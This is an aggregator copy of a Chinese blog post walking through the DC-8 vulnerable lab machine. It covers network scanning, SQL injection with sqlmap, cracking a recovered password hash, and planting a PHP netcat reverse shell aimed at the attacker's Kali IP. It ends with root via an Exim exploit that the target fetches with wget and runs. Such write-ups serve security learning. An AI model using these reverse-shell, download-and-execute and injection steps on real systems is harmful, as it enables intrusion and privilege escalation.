惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

V
Visual Studio Blog
爱范儿
爱范儿
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
雷峰网
雷峰网
V
V2EX
博客园_首页
Engineering at Meta
Engineering at Meta
博客园 - 聂微东
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
Apple Machine Learning Research
Apple Machine Learning Research
GbyAI
GbyAI
H
Help Net Security
A
About on SuperTechFans
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
Blog — PlanetScale
Blog — PlanetScale
W
WeLiveSecurity
云风的 BLOG
云风的 BLOG
D
Docker
Security Archives - TechRepublic
Security Archives - TechRepublic
Help Net Security
Help Net Security
N
News and Events Feed by Topic
Simon Willison's Weblog
Simon Willison's Weblog
G
Google Developers Blog
A
Arctic Wolf
T
The Blog of Author Tim Ferriss
博客园 - 叶小钗
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
Google DeepMind News
Google DeepMind News
博客园 - 三生石上(FineUI控件)
aimingoo的专栏
aimingoo的专栏
Hacker News: Ask HN
Hacker News: Ask HN
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
博客园 - 司徒正美
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
P
Privacy International News Feed
T
Troy Hunt's Blog
T
Tenable Blog
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
Recent Commits to openclaw:main
Recent Commits to openclaw:main
Recorded Future
Recorded Future
F
Fortinet All Blogs
D
DataBreaches.Net
B
Blog
T
Threat Research - Cisco Blogs
MyScale Blog
MyScale Blog
Hacker News - Newest:
Hacker News - Newest: "LLM"
The GitHub Blog
The GitHub Blog
Security Latest
Security Latest
M
MIT News - Artificial intelligence

卷卷

今日说法 节目汇总笔记 《斯坦福大学人生设计课》读书笔记 我的书单📖 H-worm (VBS蠕虫) 感染事件溯源分析报告 AMOS (Atomic Stealer) 恶意软件深度分析 银狐26年全面复活,对抗强度或已超25年最高水平 Atomic Stealer (AMOS) 回归:ClickFix、伪装加密货币应用与新型 macOS 持久化机制 关于xt.exe的分析报告 仿真钓鱼页面窃取用户凭证 GitHub Pages配置Cloudflare CDN踩坑之路 推荐RSS热力图和Github热力图使用指南 学习逆向工程相关概念 zabbix快速上手 学习python高级语法特性例题笔记 学习云计算基本理论学习笔记 学习Docker-Compose命令及镜像构建与推送 ATT &CK 框架实践阅读笔记 rundll32.exe恶意加载DLL文件外联 《悉达多》读书笔记 《稀缺》读书笔记 《认知觉醒》读书笔记 《营养学》读书笔记 《心理学》读书笔记 热💖生活 C++开发环境配置与程序运行笔记 IDA Free调试Hello World笔记 逆向免杀 Admin.canway账号命名方式 BAS - Breach and Attack Simulation Windows核心系统进程链与svchost深度解析 企业测试环境的弱口令需要整改吗 AI对话笔记-模板 网络安全行业招聘需求与技术能力分析 银狐木马技术原理分析与检测技术 SIEM-安全信息和事件管理 AI笔记 转载 专业备考⏳ 其他杂项🧶 Markdown 原生图片 知道创宇技能表 Prompt越狱手册 deepseek使用指南 清华大学 deepseek提问方法 markdown基本语法 数据湖:它们是什么?为什么您的组织需要一个? GitHub Codespaces velociraptor(迅猛龙)快速上手 学习windows快捷命令 学习常用 150 个Linux命令 软考中的一些概念 学习ssh基本使用 Linux系统换源输入法和包管理器 Metasploitable3下载与安装 信息收集方法及流程 防守之道 开发运维 免责声明 密码喷射攻击:防范攻击你需要知道的事项 密码学中的哈希解释:它的工作原理、算法和实际用途 应急响应术语 各种报错积累 漏洞挖掘思路 收藏夹 RDP和360星图使用 windows入侵排查 Linux入侵排查 Redis日志分析 Linux安全加固 windows安全加固 windows日志ID速查 中间件加固 数据库安全加固 windows系统提权 MySQL注入复盘 学习git版本控制工具的概念与命令 学习Web Shell 学习Linux命令 java环境配置 学习python基础语法特性解题笔记 学习Mysql基础知识 windows权限维持 学习网络及安全的一些术语 PHP代码审计 Linux系统提权 MSSQL注入复盘 Linux权限维持 命令执行和反序列化 逻辑漏洞 upload-labs 框架漏洞 学习PHP语法特性 XXE&SSRF CSRF 文件上传 Google Hacking XSS-lab XSS实验 学习URL请求后的通信过程 FOFA
DC-8靶机
卷卷 · 2025-11-26 · via 卷卷
  1. 主机扫描使用arp-scan扫描工具 --localnet 扫描本地网络

    image
    image

    .1​(通常是网关或路由器的地址)和.255​(广播地址)。而.254​ 经常被用作子网内的一个特殊设备(如DHCP服务器)的地址,但这不是一个固定的规则.

  2. 使用Nmap端口扫描 -sV:探测开放端口以确定服务/版本信息;

    -p- ​:这个选项告诉 Nmap 扫描目标上所有可能的端口(从 1 到 65535)。默认情况下,Nmap 只会扫描一些常见的端口,但使用 -p-​ 选项可以确保扫描所有端口

    image
    image
  3. 使用dirsearch扫描目录 python3 dirsearch.py -u [target_url] # 攻击目标url地址

    dirsearch -u 192.18.142 -e * -x 403 --random-agent

    -e *​ 参数表示使用所有内置的扩展名列表进行扫描

    --random-agent​ 在请求时使用随机的用户代理字符串,这有助于绕过一些基于用户代理的访问控制或日志记录

    -x 403​ 参数在这里可能是想排除状态码为 403 Forbidden 的响应。

    image
    image
  4. 访问网站

    image
    image
  5. 发现注入点

    image
    image
  6. sqlmap扫描

    image
    image
  7. 发现存在注入

    布尔盲注、报错注入、时间盲注、联合查询

    image
    image
  8. 扫描数据库

    sqlmap -u "http://192.168.18.142/?nid=1" -dbs

    image
    image
    image
    image
  9. 根据数据库名扫描表

    sqlmap -u "http://192.168.18.142/?nid=1" -D d7db -tables

    image
    image
    image
    image
  10. 扫描users表

    image
    image

    得到后台账密

    image
    image
  11. 将密码复制出来保存到adpass.txt和johnpass.txt文件中,然后使用john工具进行爆破

    image
    image
  12. 得到账户john的密码为turtle,账户admin的密码无法爆破

    使用dirb命令dirb http://192.168.18.142扫描网站目录和文件

    dirb http://192.168.18.142

    image
    image

    robots.txt

    是一个纯文本文件,在这个文件中网站管理者可以声明该网站中不想被robots访问的部分,robots.txt 文件规定了搜索引擎抓取工具可以访问您网站上的哪些网址。或者指定搜索引擎只收录指定的内容。

    当一个搜索机器人(有的叫搜索蜘蛛)访问一个站点时,它会首先检查该站点根目录下是否存在robots.txt

  13. 登录上方页面找到登录地址

    image
    image
  14. 根据地址找到登录页面并登录

    image
    image
  15. 然后将反弹shell的命令 <?php system("nc -e /bin/bash 192.168.172.131 1234"); ?> IP地址为kali的IP地址 nc反向shell

    System()函数的主要功能是在系统权限允许的情况是执行系统命令
    image

  16. 监听靶机

    image
    image
  17. 然后回到网站contact us的view页面,随便输入一些信息然后点击【submit】就可以反弹回shell

    image
    image
  18. image
    image
  19. 此时的shell不是交互式shell,所以使用命令python -c "import pty; pty.spawn('/bin/bash')"​获取一个交互式的shell

    image
    image
  20. 查看可以用于suid提权的命令 find / -user root -perm -4000 -print 2>/dev/null​ ★★

    • find /​:find​命令用于在目录树中搜索文件,并可以对搜索结果执行操作。这里的/​表示从根目录开始搜索整个系统
    • -user root​:这个选项告诉find​命令只查找属于用户root​​​的文件root​是Linux系统中的超级用户,拥有对系统的完全访问权限。
    • -perm -4000​:这个选项用于查找具有特定权限的文件。-perm​后面跟的数字或符号表示文件的权限。在这里,-4000​是一个特殊的权限位,它代表设置用户ID(SUID)权限。当一个可执行文件具有SUID权限时,用户执行该文件时将以文件所有者的身份运行(在这个例子中是root​)。这允许普通用户执行通常需要更高权限的操作。然
    • -print​:find命令默认会将找到的文件名输出到标准输出(通常是屏幕)。-print选项实际上在这里是隐式的,但明确写出来可以增强命令的可读性。它告诉find​命令打印出找到的每个文件的路径。
    • 2>/dev/null​:★★★这部分是重定向的一部分,用于处理错误消息。在shell中,2​​​​ 代表标准错误(stderr),而>​是重定向操作符。/dev/null​​​​ 是一个特殊的设备文件,通常被称为“空设备”或“黑洞”。写入它的任何数据都会被丢弃,读取它时通常立即返回文件结束。因此,2>/dev/null​的意思是将所有标准错误输出重定向到/dev/null​​​,这样就不会在屏幕上显示任何错误信息了。这对于忽略那些由于权限不足而无法访问的目录的错误消息特别有用。
    image
    image
  21. 发现一个比较奇怪的命令exim4,先查看一下命令版本 /usr/sbin/exim4 --version

    image
    image
  22. searchsploit exim 4​ 搜索可以利用的提权方法 选择使用46996.sh

    image
    image
  23. 使用靶机的wget命令将该脚本下载到靶机中,先将kali机的apache服务开启,命令service apache2 start

    image
    image
  24. 将攻击脚本文件复制到Apache服务的根目录/var/www/html下,命令cp /usr/share/exploitdb/exploits/linux/local/46996.sh /var/www/html/exp.sh

    image
    image
  25. 在kali中使用set ff=unix,告诉编译器,使用unix换行符,否则会无法使用脚本

    image
    image
    image
    image
  26. 在靶机反弹回来的shell处使用命令wget http://192.168.172.131/exp.sh​将脚本下载到靶机中

    由于前面目录没有权限所以换目录下载

    image
    image
    image
    image
  27. 成功将exp.sh下载到靶机中,但是发现没有执行权限,使用命令chmod +x exp.sh​赋予脚本执行权限,并使用命令./exp.sh -m netcat​来执行脚本

    image
    image
    image
    image
  28. 提权成功,跳转到/root目录下即可查看flag

    image
    image